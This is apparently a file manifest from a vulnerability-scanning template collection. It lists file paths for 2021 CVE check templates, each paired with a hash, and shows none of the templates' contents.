+http/cves/2021/CVE-2021-24762.yaml:31d255c99d3bbcfdf0aafd8622010a49ba8e6505 +http/cves/2021/CVE-2021-24827.yaml:687eb7ea7cbd313e9a663f08afbebc735d307829 +http/cves/2021/CVE-2021-24838.yaml:5b2e7913385e4b5731d8bdd2e16d72ef6e25ef3d +http/cves/2021/CVE-2021-24862.yaml:c74b17ae16244603f6d14ae31e7556949b086e3e +http/cves/2021/CVE-2021-24875.yaml:1ceb3ab0945dc895504d667f2b080c756e54f4ba +http/cves/2021/CVE-2021-24891.yaml:081f1f6a55ebc1aa056feefecdb76433dbfecb40 +http/cves/2021/CVE-2021-24910.yaml:4a0b4bcdfc1c9ba20f3e68100f9144a2d8c64267 +http/cves/2021/CVE-2021-24917.yaml:b0c9dade72566fd0ba9de31e8ad92ccadef52395 +http/cves/2021/CVE-2021-24926.yaml:50138dacf2f23baa5f7cfca19fa82538699066a5 +http/cves/2021/CVE-2021-24931.yaml:66a48c0f6ccb1609d4d836bc47e5fc2639595fb9 +http/cves/2021/CVE-2021-24940.yaml:43902f848bd3c31411875f7b091bd7ea15326402 +http/cves/2021/CVE-2021-24946.yaml:26b8d466e7ec9a0f4e6743d390ffa64214a03306 +http/cves/2021/CVE-2021-24947.yaml:9679157866a0f12677da36e5cd8483bc683b567a +http/cves/2021/CVE-2021-24956.yaml:cae26a5d584f3a379b2498851b2dc031bb0cd5b6 +http/cves/2021/CVE-2021-24970.yaml:17ce9ae9dfed14dc12e888596763fa8eda503a94 +http/cves/2021/CVE-2021-24987.yaml:3f07d7cdb9ed7161c661df8cf13e1b786d6be6c2 +http/cves/2021/CVE-2021-24991.yaml:cf1f389ac7818ad85a634b01c2af1683cbc348df +http/cves/2021/CVE-2021-24997.yaml:61277495ecb88d22294f8e4135037a08ee6d22bf +http/cves/2021/CVE-2021-25003.yaml:c9b8aafb0c73d5343e979fabae0fcb42131a2fb8 +http/cves/2021/CVE-2021-25008.yaml:2eab4f3ca4b2e4e2bef4ba4f1d89b69dce14d776 +http/cves/2021/CVE-2021-25028.yaml:e17019d03f63bf9738830c77ca4fe298ce1a91da +http/cves/2021/CVE-2021-25033.yaml:224b5d49ea6898e22eaf0183ec0c4ac5ed4720ca +http/cves/2021/CVE-2021-25052.yaml:3e6ef871ca2d0b6ebffcc20a76987ed52efde641 +http/cves/2021/CVE-2021-25055.yaml:3aa2b3f4d7e8e551b337df0d5b74b53860b1ab5d +http/cves/2021/CVE-2021-25063.yaml:b6b7c31553f516230895f2594b8cacde51376b92 +http/cves/2021/CVE-2021-25065.yaml:de8d15aaa563f1fb0aa6cb8ac1af49be8f53c6e5 +http/cves/2021/CVE-2021-25067.yaml:21f4e74d56f768e08339bddcd0f406eb8268ef74 +http/cves/2021/CVE-2021-25074.yaml:e5b7f6cb856e192b7fd034400b729084d5072321 +http/cves/2021/CVE-2021-25075.yaml:1e189d30f50c7c8b4dd8b065cef113b8517153fb +http/cves/2021/CVE-2021-25078.yaml:6658645bba08738e26ac2a001ac6da425274dfad +http/cves/2021/CVE-2021-25085.yaml:eb4660f04d2575846ef35d5fec02dc25c65943e4 +http/cves/2021/CVE-2021-25099.yaml:7f842f7baf91e94c72ed6d659fc8027499e6ba24 +http/cves/2021/CVE-2021-25104.yaml:aae0eee5c84c3cbe077095bfac81f7a138538a9d +http/cves/2021/CVE-2021-25111.yaml:b255d6cd39d204c173f94fcddcfa9c7116cd0006 +http/cves/2021/CVE-2021-25112.yaml:04431a22421d5d897edeb855f5047f5034c1454f +http/cves/2021/CVE-2021-25114.yaml:a6efabcf0f8a91061e92979b3cb5fa11724053eb +http/cves/2021/CVE-2021-25118.yaml:201039c303f3f87e55b99e6b4fd9c5a6fd76977d +http/cves/2021/CVE-2021-25120.yaml:f291eb580e6805439a50d6a3791fa357b590e6bd +http/cves/2021/CVE-2021-25281.yaml:de988fde90a7eea27e734a28ecb3a00039a71d0e +http/cves/2021/CVE-2021-25296.yaml:f7c3038bec3ff35336f6c226ea175c633f449ab8 +http/cves/2021/CVE-2021-25297.yaml:c7ea048c186829a11809643f181939e7e014e57d +http/cves/2021/CVE-2021-25298.yaml:e75869526115ed19a2a3b45f6cded5bdca4acbb9 +http/cves/2021/CVE-2021-25299.yaml:727488249f68183344497c230fffd87a3d6424ef +http/cves/2021/CVE-2021-25646.yaml:53663b6491b3cb1c8048ab4f3d57e0bebf0e1263 +http/cves/2021/CVE-2021-25864.yaml:9544d9db6e1ced06493d9d770e7b9fc51dbdb8b0 +http/cves/2021/CVE-2021-25899.yaml:cc6e50dcca5fcbbd59eb3edfc9621d9a125adedd +http/cves/2021/CVE-2021-26084.yaml:457804b80f212b6c08ec1d6460534a4689c59808 +http/cves/2021/CVE-2021-26085.yaml:48e7e2d317448f9d37702589b97174f980fa5c1e +http/cves/2021/CVE-2021-26086.yaml:4fcd87cf451c18b6dbf85c04d1115a9e77e90e4a +http/cves/2021/CVE-2021-26247.yaml:27ea67c7c40dcb15c60c3ed0fe03426f854d7f0f +http/cves/2021/CVE-2021-26295.yaml:3a075e4e3da55ead992a49a0b689da438f436192 +http/cves/2021/CVE-2021-26475.yaml:644a6dd81b6472d7034f376022ca8c18d1cecb7c +http/cves/2021/CVE-2021-26598.yaml:7a4a26747b741a7acfa4ee46cbea0eeecd32ec21 +http/cves/2021/CVE-2021-26702.yaml:7e591a54f19006922a75d8a4ac6cd7347d716570 +http/cves/2021/CVE-2021-26710.yaml:284fc4ab7fc965ffb761f7a0f1fa342495f11ea1 +http/cves/2021/CVE-2021-26723.yaml:ded28829b11b27f4f41feaef80f3f2ea91acf6ea +http/cves/2021/CVE-2021-26812.yaml:89ed7b2b3005441d66b71098c9898036bfffa0a4 +http/cves/2021/CVE-2021-26855.yaml:c190d4ba6e3d92c3edbf12c6a471dadbfe9f31d8 +http/cves/2021/CVE-2021-27124.yaml:a851e39676b17c636de41b1a35bc4f974930cb18 +http/cves/2021/CVE-2021-27132.yaml:5dda7aee1a43f0816109579f00d8d2e84b7262b5 +http/cves/2021/CVE-2021-27309.yaml:8c6e5371b0665ac6b5b5cf7d3eadf1889bdc43d3 +http/cves/2021/CVE-2021-27310.yaml:3556c35b3c575b9c0c666f58b98e3fd7b8c3bc1d +http/cves/2021/CVE-2021-27314.yaml:3aa55e5699eea266e92b1d7bb98a35b67ad07dff +http/cves/2021/CVE-2021-27315.yaml:594fa6ea25e39a205afa05aed46fdcd49d435a27 +http/cves/2021/CVE-2021-27316.yaml:099c9b1c90de09088db98d8d0dddc2d633edf2c4 +http/cves/2021/CVE-2021-27319.yaml:48d8ca10e243d5b05b88ddfe6facc526edd50711 +http/cves/2021/CVE-2021-27320.yaml:445d93c318df9fbbdebd71cde29bd740745d5f0a +http/cves/2021/CVE-2021-27330.yaml:be9b2e39565adce8acc40f86da7a04bf2905a9e8 +http/cves/2021/CVE-2021-27358.yaml:2c9a18bbb72b7612c64f59a55388e76f3534ea93 +http/cves/2021/CVE-2021-27519.yaml:768939aa01ff11fac4deb095328d16a9becd7add +http/cves/2021/CVE-2021-27520.yaml:a6c357a0db005d7f1a1f77a7336e28d0a903977e +http/cves/2021/CVE-2021-27561.yaml:249221f1f8f3acea2772fb4210ed9b092c6d26d6 +http/cves/2021/CVE-2021-27651.yaml:35f2eca244ddb3ef8eea87b4c15fa715b8a82268 +http/cves/2021/CVE-2021-27670.yaml:590a9e5d087bb5c531a5e8d034cb8beb9d009cde +http/cves/2021/CVE-2021-27748.yaml:4f8ad1b37b4f7ac02c06454ae90b9e1b4e4019fb +http/cves/2021/CVE-2021-27850.yaml:12c5664e596def2aa0a7891979ea7493a0cca870 +http/cves/2021/CVE-2021-27905.yaml:968845093324d70725b953b8c7720afb9c5db9e2 +http/cves/2021/CVE-2021-27909.yaml:9bca3a26b34ba24666e71a0004762cddfcbe2150 +http/cves/2021/CVE-2021-27931.yaml:c238bcf649fc9f2a34fd6caeb9a1e1b31b68398f +http/cves/2021/CVE-2021-28073.yaml:0154658250b8505c8c9e1475a346e55017acd74e +http/cves/2021/CVE-2021-28149.yaml:e44045abb2f2a3ca25918e74c84f4520419670b0 +http/cves/2021/CVE-2021-28150.yaml:b45dafa85610d958a2692befdc72c82f5aaffd97 +http/cves/2021/CVE-2021-28151.yaml:ee87b716c8449fb5b95a695eb4aa0bb993787531 +http/cves/2021/CVE-2021-28164.yaml:ee07482ce5ed64dda90a3a724385a97c5f6e82dd +http/cves/2021/CVE-2021-28169.yaml:1518de03a0d5f472386b9804aec98f4be87d1be6 +http/cves/2021/CVE-2021-28377.yaml:01a2279945af0bd2a001a57e60410de19d4d6ee6 +http/cves/2021/CVE-2021-28419.yaml:687c422e1f6c37085bbffcdb092d545e11d20802 +http/cves/2021/CVE-2021-28854.yaml:aa4edd56f0848e571753b49293ee2ebf40191f7c +http/cves/2021/CVE-2021-28918.yaml:ba3f93dd6c166d2e072a419f276001afd965a1af +http/cves/2021/CVE-2021-28937.yaml:2641b6b2ae133b16329e2526b7c295c480a4c503 +http/cves/2021/CVE-2021-29156.yaml:c2e95056d98f0600ce8c0865c809cbb28d3203d2 +http/cves/2021/CVE-2021-29203.yaml:2ed3175fa21a41f0512ce01362edfdc7d185b61e +http/cves/2021/CVE-2021-29441.yaml:578136431d5e9ef01cc736b87bc2d51286ce339c +http/cves/2021/CVE-2021-29442.yaml:52aff5df60a331d971c752d9dc395930a6af1357 +http/cves/2021/CVE-2021-29484.yaml:5a773501c99b89a4e297cf1295616bae6820135d +http/cves/2021/CVE-2021-29490.yaml:737558d3aaf1d583987bf96020a76ec9e332f87f +http/cves/2021/CVE-2021-29505.yaml:d67c8d9d3755d91b86980cffac814bed91c73b4a +http/cves/2021/CVE-2021-29622.yaml:742791dfea6df4eab334ede5242288185e7e52d1 +http/cves/2021/CVE-2021-29625.yaml:f8639195dd71620ed79473bb39bcb8bb20e9999a +http/cves/2021/CVE-2021-3002.yaml:b3217742dff32f030af1041cbbe4c4e13b1e44fd +http/cves/2021/CVE-2021-30049.yaml:a8b66e8bc3d1e1ab3257b72e21c96abd083ef8e5 +http/cves/2021/CVE-2021-30128.yaml:49e75b4040ce85300a9db8172cfdd30acb4f96fb +http/cves/2021/CVE-2021-30134.yaml:6d7ec8971b5869860086fc5360a143845b1289be +http/cves/2021/CVE-2021-30151.yaml:eb0e4c33a1e135758656d42c422159e4b441482b +http/cves/2021/CVE-2021-3017.yaml:38320c26e4dfe0986e6a31fb8f9ffc49daef2dae +http/cves/2021/CVE-2021-30175.yaml:235ea7c6350d4d0e478e71874502cdf4df910501 +http/cves/2021/CVE-2021-3019.yaml:ce0b46d3345b49919975dd790fbedcfb9831d72b +http/cves/2021/CVE-2021-30213.yaml:22518697f4402156c3ce7919b5b6a22d14b3ae68 +http/cves/2021/CVE-2021-30461.yaml:c1a1e318e3ca99c194200b99b5b4bd225dc0ecac +http/cves/2021/CVE-2021-30497.yaml:010f04ce9033d20b8d4dcd94bb4cd45adc081d6e +http/cves/2021/CVE-2021-3110.yaml:b6df9de1253b5b78a2a9da3085bd256c5ccf86d2 +http/cves/2021/CVE-2021-31195.yaml:3bc665f94c36d9c07b893d0b2640b83b6e7ccf50 +http/cves/2021/CVE-2021-31249.yaml:56b20dbed52436e3b73edc2e739819ec1fff2fef +http/cves/2021/CVE-2021-31250.yaml:df76242faef75568b6a2fe49d71b2fc9b2c6ead1 +http/cves/2021/CVE-2021-3129.yaml:fe6fd64fc2f18417a9104275a0cfd400133613d4 +http/cves/2021/CVE-2021-31537.yaml:d48ee672753a8ef03cdb4f70705b8e7775af2f9b +http/cves/2021/CVE-2021-31581.yaml:ce0d94ac7d8c07d68eaa2d7bf561945f1d1ca29e +http/cves/2021/CVE-2021-31589.yaml:6767ce4bba77e0676b602751659c1db2355c6a0f +http/cves/2021/CVE-2021-31602.yaml:5c39a4ff61f2d62d3c29f121aeb1d942b009180d +http/cves/2021/CVE-2021-31682.yaml:129719fc36b51ef1e613ded93675b6e49662bb57 +http/cves/2021/CVE-2021-31755.yaml:773c59ae995a5dac8fbd4ec6d0904aac4e80d599 +http/cves/2021/CVE-2021-31805.yaml:50cbb906ef2d896af9d322482b5eb0467f230132 +http/cves/2021/CVE-2021-31856.yaml:33db8d834720d2b4422550374a8d835c59a12472 +http/cves/2021/CVE-2021-31862.yaml:0a8c014565143f008b07bc86ead4344f6aa9e462 +http/cves/2021/CVE-2021-32030.yaml:33f66e7606ee56f0fc3af4633f0839d499a947e3 +http/cves/2021/CVE-2021-32172.yaml:1d33039724e21f9c48266027df0145a1c5f08fa0 +http/cves/2021/CVE-2021-3223.yaml:c81ff8dc2d18a4a6d10406ff374288c42e614e80 +http/cves/2021/CVE-2021-32305.yaml:55fad1242d64349745ff55bd54a301a6bf70e4b2 +http/cves/2021/CVE-2021-32618.yaml:9c357bda8fee3273525fdbbab7adfb26f4a3200c +http/cves/2021/CVE-2021-32682.yaml:b729766ca3a1b76836d67495f89369d826d11e39 +http/cves/2021/CVE-2021-32789.yaml:fd61133b2907a3690118cdb529509dee7a4c15bd +http/cves/2021/CVE-2021-32819.yaml:eb582f3f2fd40998863d007ca6daebc799f70511 +http/cves/2021/CVE-2021-32820.yaml:adf73374e43a9ec2f896c185c504b1cee329a9e6 +http/cves/2021/CVE-2021-32853.yaml:2362defbc8557d843143ba8ef0f1c465259e5729 +http/cves/2021/CVE-2021-3293.yaml:69b595db40b93f24c9b638b76d6b39c19e0de4cf +http/cves/2021/CVE-2021-3297.yaml:de63e28903282ca010515dca310eec6fdcbd648f +http/cves/2021/CVE-2021-33044.yaml:7c113c3cc95b3b9a9b1db472bb32484162db0a01 +http/cves/2021/CVE-2021-33221.yaml:37d63424f320414a4f0489b7366fb9601b46a22e +http/cves/2021/CVE-2021-33357.yaml:3b0401d9738c0743bdf13e5b49da700bf44f2800 +http/cves/2021/CVE-2021-33544.yaml:dc0855c75d18ca85be1dc5c9d841ffa1ab3865f4 +http/cves/2021/CVE-2021-33564.yaml:a54245dbfdbaaf23d157bfa6e6d9135893251574 +http/cves/2021/CVE-2021-3374.yaml:1fa78039e501096f7440b7538f210f8e9e167300 +http/cves/2021/CVE-2021-3377.yaml:85855226a59076b4733d5079b5d7d6ae4b682d24 +http/cves/2021/CVE-2021-3378.yaml:1736756b16f1033eee67c18aec777a84fbe168fe +http/cves/2021/CVE-2021-33807.yaml:6fbb85e4ecb0da85615603c911084e65e152c6b8 +http/cves/2021/CVE-2021-33851.yaml:ca7739f0f851b46fa0bf24fad69a0cc5a4a961c9 +http/cves/2021/CVE-2021-33904.yaml:c10e434da24852491511fac03a8ee79ff0e9d49c +http/cves/2021/CVE-2021-34370.yaml:b19f962d83f5ce83fcf5a9db68415ef4baf7f1ab +http/cves/2021/CVE-2021-34429.yaml:8a76a031a2ce1d6eb17b1774f441ef5060c0379c +http/cves/2021/CVE-2021-34473.yaml:c03f0a6488236b7e947429cbab52ad8821210d07 +http/cves/2021/CVE-2021-34621.yaml:8be13d562025ef1ac52afcc85effe5da6ef64a7e +http/cves/2021/CVE-2021-34640.yaml:db7e8ecc6ded32ec0832cfce2add42cd0a0b8fff +http/cves/2021/CVE-2021-34643.yaml:52088f8da445d787259d8f55cb3e32c45a5a26c3 +http/cves/2021/CVE-2021-34805.yaml:1a7ab7880e674e605f0e74a13e645b62845e7db3 +http/cves/2021/CVE-2021-35250.yaml:1b1214ca364fc08ac7366fb1ac39f9046a305c19 +http/cves/2021/CVE-2021-35265.yaml:0876ef239b3fa0c7a1a4448f7657b8e63fe57b79 +http/cves/2021/CVE-2021-35336.yaml:c09985e80d62e1d37f369514ab0172c1ef1ab266 +http/cves/2021/CVE-2021-35380.yaml:35727ab34e0871931dcaa6fba74eafff4dc5c39a +http/cves/2021/CVE-2021-35464.yaml:5a66e5d17f05125d18ee4bf276f0c39e8933a352 +http/cves/2021/CVE-2021-35488.yaml:a46a5f08bb0013684cd8207690f05404546e1f1b +http/cves/2021/CVE-2021-35587.yaml:d8042d9d9489a2b5bb3d47ffdca924b64a6540f4 +http/cves/2021/CVE-2021-3577.yaml:cc4f9da970937741ca48ccb90251bdcc3e392dec +http/cves/2021/CVE-2021-36260.yaml:c4d3f62075e6418987155fc6d20bcf2dbc5c9f22 +http/cves/2021/CVE-2021-36356.yaml:050ec4efa36787705f978a617f5e3c87d92d3ddd +http/cves/2021/CVE-2021-36380.yaml:e059207a06020844862dc1700c2ba916f52f890f +http/cves/2021/CVE-2021-36450.yaml:72e0826a0756881eb778d3ed9a034d115bcf69fe +http/cves/2021/CVE-2021-3654.yaml:971864d0da3fc16596be27d4fc4ea169dd7982ce +http/cves/2021/CVE-2021-36580.yaml:1cd6f534e489ab1561167439d13d4564b94ca62d +http/cves/2021/CVE-2021-36748.yaml:99df0b28fb46e7a40162a306e5fd6588c54dbb44 +http/cves/2021/CVE-2021-36749.yaml:92653565962ea99bde113e7721d7c171e1a092ce +http/cves/2021/CVE-2021-36873.yaml:a07653d7b233666f1cedc0a9588e93bd8eda008e +http/cves/2021/CVE-2021-37216.yaml:a52f473b99bb7c46d019f9c52c9fb24fd84ba99d +http/cves/2021/CVE-2021-37304.yaml:f78554bcddfbe7ccf08d9c0e8da9768eb91b40ca +http/cves/2021/CVE-2021-37305.yaml:5e072df5931021eafc43051a4d292528c7ec475c +http/cves/2021/CVE-2021-37416.yaml:714b8a183c226ce50f97377b74e18160165cfcb7 +http/cves/2021/CVE-2021-37538.yaml:c7a240dc4d840f86c94148d34e3ad87e2ad3e772 +http/cves/2021/CVE-2021-37573.yaml:d79212917cfc09c3fa07d8fcf9ea5bfefa86667e +http/cves/2021/CVE-2021-37580.yaml:2396e118cf588f24089f5abd644e98519f1cd44b +http/cves/2021/CVE-2021-37589.yaml:92f29ef51baef7ca64a595bacdef0d514e8f2d1a +http/cves/2021/CVE-2021-37704.yaml:927d3ec574e8f2c8eb3979818e5eb3ce7c38ed14 +http/cves/2021/CVE-2021-37833.yaml:84877550e87c2dc042b4e62bbe4fc24d74d36bbd +http/cves/2021/CVE-2021-38314.yaml:ba9a16b3571cf5245ca785439fc5b7bf8a2b886b +http/cves/2021/CVE-2021-38540.yaml:4ba4ece4472b2f82968172b93b6778e954eb8329 +http/cves/2021/CVE-2021-38647.yaml:811de8a938aa51196c0c62686b917a7eb3daacdb +http/cves/2021/CVE-2021-38702.yaml:9edbc42c151c322b8ea656d15b02c5450dee0b8b +http/cves/2021/CVE-2021-38704.yaml:d491b1131fff0a63276847a3446ad2519399813b +http/cves/2021/CVE-2021-38751.yaml:9074f9b3969b766cb330b2d0c98d4255bdff3d44 +http/cves/2021/CVE-2021-39141.yaml:2cf8873fb53424bb2443b88e8b261b5e766b974c +http/cves/2021/CVE-2021-39144.yaml:7792754010c5b3a9815f0546d4340f53db097b59 +http/cves/2021/CVE-2021-39146.yaml:00037b0b433be5b634d1dd72e991f37c43403d1e +http/cves/2021/CVE-2021-39152.yaml:69d94ed3695edb3a6332102dfe790f6da0ef386e +http/cves/2021/CVE-2021-39165.yaml:16af0fa50d7e551e167ffc01088f90f2e80e2597 +http/cves/2021/CVE-2021-39211.yaml:69480c5bb68fef05d91cfb99e23232314d6f37a3 +http/cves/2021/CVE-2021-39226.yaml:5825cc51f5a74ff42246e3c93fab60c1abef2294 +http/cves/2021/CVE-2021-39312.yaml:66696baf2f2e5ad6756c1750361de710d1675e4c +http/cves/2021/CVE-2021-39316.yaml:6b5e955c7c17968c5a531c0d421c3d58821a6f62 +http/cves/2021/CVE-2021-39320.yaml:c86b6f13315536db6ca309a12b1460987e96caac +http/cves/2021/CVE-2021-39322.yaml:8beadf38cd0bc859005d864f74b83d7b18c5fa32 +http/cves/2021/CVE-2021-39327.yaml:fc57f925057acf33f2587806704e874659f9e319 +http/cves/2021/CVE-2021-39350.yaml:3614ba407dea28425d53d0aab9ef2c1bff1845e9 +http/cves/2021/CVE-2021-39433.yaml:46ffa408fd7ab44730a695a5f39d5d73765e3954 +http/cves/2021/CVE-2021-39501.yaml:a16d654f3a3c9c6707bcc9a290c948bd038e9de6 +http/cves/2021/CVE-2021-40149.yaml:4def377aaab4697dec0356e7802730e7ed539bb5 +http/cves/2021/CVE-2021-40150.yaml:6147719529de3fb147005fa1c41d178d268007a6 +http/cves/2021/CVE-2021-40323.yaml:f4aae76a9247b4d080c77fde0c50f45c18186bad +http/cves/2021/CVE-2021-40438.yaml:f3e60a4948a65f139b571df33f31644d92603467 +http/cves/2021/CVE-2021-40539.yaml:85a5dc7a5e6d43af7e644af756dd878832364b78 +http/cves/2021/CVE-2021-40542.yaml:3ea2928686e8605c70148d038dccc9231a8ac8c9 +http/cves/2021/CVE-2021-40661.yaml:c8c5e47c75538d721df012be4e1eb6ee2d1c16fd +http/cves/2021/CVE-2021-40822.yaml:7343368a489b28d92907fa8c784c67e3175c663f +http/cves/2021/CVE-2021-40856.yaml:746e5e162eaa354c99fb72812f67e39403d5dcaf +http/cves/2021/CVE-2021-40859.yaml:9552c11770b9da93012366dddc9fc296d729c235 +http/cves/2021/CVE-2021-40868.yaml:3eff5b72a65c2620143911d3a8dd7404669f1a72 +http/cves/2021/CVE-2021-40870.yaml:fc237c681725db50a13491bebea5a0ab2b054cb5 +http/cves/2021/CVE-2021-40875.yaml:0796b59aaeb051127748624ef5089bbcc2fb6cc6 +http/cves/2021/CVE-2021-40908.yaml:8d4a4c3b035f2382d58f27b3bb12e4aa5b7d640a +http/cves/2021/CVE-2021-40960.yaml:6a818b00b2ef60a2f153aa6e8063a0c8a79f8adc +http/cves/2021/CVE-2021-40968.yaml:b896355f562ca93d124a2af34339dc3b7e929cb7 +http/cves/2021/CVE-2021-40969.yaml:9c46493278e43608d62d77270f9a4926c603d529 +http/cves/2021/CVE-2021-40970.yaml:b51c18dc430dcd5d56698efdef859e85a8f0feb7 +http/cves/2021/CVE-2021-40971.yaml:03603d6b4bec5bb0a7fbca49813101128ac1e21f +http/cves/2021/CVE-2021-40972.yaml:d1c9f6e850d659ca2e5c473a5179e0d244ef98d7 +http/cves/2021/CVE-2021-40973.yaml:e23039a43bf98983ac238f3dbda012e7ed8e49cb +http/cves/2021/CVE-2021-40978.yaml:7d895bbc0620eb95378adef868583eaa30bddcc2 +http/cves/2021/CVE-2021-41174.yaml:c998f670f719064c9228cd2ea0fade3d84dd51c9 +http/cves/2021/CVE-2021-41192.yaml:79647458b3d8f514bfa8e1a3011ddecada4b32b7 +http/cves/2021/CVE-2021-41266.yaml:28484be8d8b69a8eb708612e7249de97f3e02519 +http/cves/2021/CVE-2021-41277.yaml:fcbb7d4968dfd3e7e9bd1606600e460d59dc4941 +http/cves/2021/CVE-2021-41282.yaml:aaf1a54e388a17a7306cb01546835719b3bd81c4 +http/cves/2021/CVE-2021-41291.yaml:1d054df3d009f5228e64475b2033af6d02fae835 +http/cves/2021/CVE-2021-41293.yaml:bcf8acaa7c3909be8b70b2f23acf008c2e0d5fd2 +http/cves/2021/CVE-2021-41349.yaml:acd5095dda3ceb708ac9a145eb1d9d7533b2c8f8 +http/cves/2021/CVE-2021-41381.yaml:0e399b427211d5f4000d4410616d549875d2b6cc +http/cves/2021/CVE-2021-41432.yaml:85b6a261dd52809e8e358b6e560219c1ccffba44 +http/cves/2021/CVE-2021-41460.yaml:7f4a4a3deb0f31ab53d5a54c64616f2db49a87dd +http/cves/2021/CVE-2021-41467.yaml:0f084395d080e3643601eb06a1713e21d429f4c0 +http/cves/2021/CVE-2021-41569.yaml:15a9c0dd2a3b6a1ec10364dbf02cad2209fcffea +http/cves/2021/CVE-2021-41648.yaml:fd3e90faf7f1f8915fb146d084256d22eb807cdf +http/cves/2021/CVE-2021-41649.yaml:582ba45c9bc615a4b97422e65c284ead6fabe1b8 +http/cves/2021/CVE-2021-41653.yaml:adb85ce0446f8e2d2bbfcb2995d468b477bc5b55 +http/cves/2021/CVE-2021-41691.yaml:2a36b888d586959927e781f8ab246b694b7ab67d +http/cves/2021/CVE-2021-41773.yaml:e13117fe011987862e5c97e39d759726e0a32b6a +http/cves/2021/CVE-2021-41826.yaml:9a14ec508df837142a9933753671740a2a086650 +http/cves/2021/CVE-2021-41878.yaml:ca57e4de4ba4bbc7a3497a7caa8b2cc3fc22c128 +http/cves/2021/CVE-2021-4191.yaml:c7fe3c123a6293fd04b41bb3c865d30a81af8092 +http/cves/2021/CVE-2021-41951.yaml:79e36ae6b05ffe189c1e254199fa9ea5c07944b5 +http/cves/2021/CVE-2021-42013.yaml:80ba87d79844ee38725c9a6538245fe92e83793c +http/cves/2021/CVE-2021-42063.yaml:3eba692b44c0549f2fa9aa6ab51e12573a1fd3c6 +http/cves/2021/CVE-2021-42071.yaml:39f276722011f3d0acc14e5a2258a27b8e04bf4c +http/cves/2021/CVE-2021-42192.yaml:760018e944d7dba243fe6ca6a445833970e0f284 +http/cves/2021/CVE-2021-42237.yaml:4362f1406ec4b208d3f930e336584d0e26433a8a +http/cves/2021/CVE-2021-42258.yaml:e282a3c4865cfadcae2b0a8f5acbe021c4ed8257 +http/cves/2021/CVE-2021-42551.yaml:128cbb3a0bd65784daeacd25defb6cb2ba651e1d +http/cves/2021/CVE-2021-42565.yaml:0729dfd61b138a95e01098a814156b22e14d86a3 +http/cves/2021/CVE-2021-42566.yaml:9e1831842766a474d8fd131b7788ca9b4152309a +http/cves/2021/CVE-2021-42567.yaml:d4cadb9edb3b350868afa115b1c9a89e70b02e62 +http/cves/2021/CVE-2021-42627.yaml:5fd40cd3114bae78732d4aefcd0d3b9982206936 +http/cves/2021/CVE-2021-42663.yaml:eebc9850598196b4c8970a78b004b545154310af +http/cves/2021/CVE-2021-42667.yaml:54300765db279096a67bfc86e202079abc6718d7 +http/cves/2021/CVE-2021-42887.yaml:411f94d71d6b7295ec39f05a7b0702f4dcdc0f26 +http/cves/2021/CVE-2021-43062.yaml:f569c8af02e6e92dceed5b679b9566e920977e56 +http/cves/2021/CVE-2021-43287.yaml:ce06bf7f9f86ba799033dae3d85548000fa9473c +http/cves/2021/CVE-2021-43421.yaml:f1245c9ad57e935fe8f19e60a1d443ff47874017 +http/cves/2021/CVE-2021-43495.yaml:7d3c77ab555ccedc6e50461048a6e4ea976187d3 +http/cves/2021/CVE-2021-43496.yaml:0569b7dc74a91c76df9245e46d9cbaa1640c0721 +http/cves/2021/CVE-2021-43510.yaml:13fe77b38ed98e65da2c0997d91c721214fe6546 +http/cves/2021/CVE-2021-43574.yaml:4e0ad46a3546f228ed9a419e100934eb2ab9eac9 +http/cves/2021/CVE-2021-43725.yaml:42289ecf5589da95ab7479a91a82ed89b2124d26 +http/cves/2021/CVE-2021-43734.yaml:a18923c0a8ac26bec0604860491e21cedec457f7 +http/cves/2021/CVE-2021-43778.yaml:4c00222185b5f10a2b8afdc142b91004ed45a316 +http/cves/2021/CVE-2021-43798.yaml:37f5b6f192633b335529a1c5f046d487f18d2e3d +http/cves/2021/CVE-2021-43810.yaml:ace5a2f65b3de870e781785e8fcb9f167a9e3075 +http/cves/2021/CVE-2021-44077.yaml:f46ac8ba700b9ac3df5dea64ba105cc28f367784 +http/cves/2021/CVE-2021-44138.yaml:821e0d36aaf1013b9491391cd1e1e3d2b168d1bb +http/cves/2021/CVE-2021-44139.yaml:000d8601a4096c4e9e4beae9140754cea4bf5fe9 +http/cves/2021/CVE-2021-44152.yaml:f59980734485bf9cbdc24cf837ad27a2948bce34 +http/cves/2021/CVE-2021-44228.yaml:36a97461b892430f405f80f5699ff10692835294 +http/cves/2021/CVE-2021-44427.yaml:726f784aa1974e7afc643b84682655d09a8b7cc1 +http/cves/2021/CVE-2021-44451.yaml:28a4a79638b2e6254d4c0dcc35be0716f9a3cb2b +http/cves/2021/CVE-2021-44515.yaml:be8149e062b1bf05ac2f061d976b61e8738bc0ef +http/cves/2021/CVE-2021-44528.yaml:e5fc3bec48f58ded99d8b01f3d4a4a275a2b2bd8 +http/cves/2021/CVE-2021-44529.yaml:f9b46fbfe740628f3358c95316c2b908ffac4765 +http/cves/2021/CVE-2021-44848.yaml:8385198397fe3ee174e225cb324bbf82c8e75fa6 +http/cves/2021/CVE-2021-45043.yaml:cd57d740f4e58a592138a7997a550ee12dcae9b7 +http/cves/2021/CVE-2021-45046.yaml:9b2393e83052b9b9e1ced3e3b85cd647d8b9ac5c +http/cves/2021/CVE-2021-45092.yaml:f044ce52a7f858ff2ee60e0ca49d3065fc7b3e2b +http/cves/2021/CVE-2021-45232.yaml:bd7f5a70b556a3f7378c50caba6ac5531e99d81c +http/cves/2021/CVE-2021-45380.yaml:f729d7c131fc7ee0f5658fae64909c8b6e16e134 +http/cves/2021/CVE-2021-45422.yaml:be0141107d2eddb73716c61ff3772b9ad70410e4 +http/cves/2021/CVE-2021-45428.yaml:0fb150e2b6940f4908e986ef8c94f6294415894e +http/cves/2021/CVE-2021-45967.yaml:5cb6a5fc1f8feab51ea2cd80ad7d22c7f5d65c5d +http/cves/2021/CVE-2021-45968.yaml:bdd8b747b7d7cfce92e4b4932248686accc0a3d7 +http/cves/2021/CVE-2021-46005.yaml:21538b9d419f9da626deed73304e3862a1a0b47c +http/cves/2021/CVE-2021-46068.yaml:43769fa9c9ecb53292997ec20cd38e58b2ebf501 +http/cves/2021/CVE-2021-46069.yaml:d8245cf4b7141d3072dcfb20bad5e9dcefb036c9 +http/cves/2021/CVE-2021-46071.yaml:373ce2700f594608afccb51edb10210b09bab1cb +http/cves/2021/CVE-2021-46072.yaml:6a82e3ac41ea470a6a371b2ddb2bc599803b4000 +http/cves/2021/CVE-2021-46073.yaml:734f0a69675de943cf42891fe7967bdba04df836 +http/cves/2021/CVE-2021-46107.yaml:c6f560de1a8a5e53a98baf5e0f472eca026a9db8 +http/cves/2021/CVE-2021-46379.yaml:355a3242c6a9afa5db79152cfebb655ac61d79da 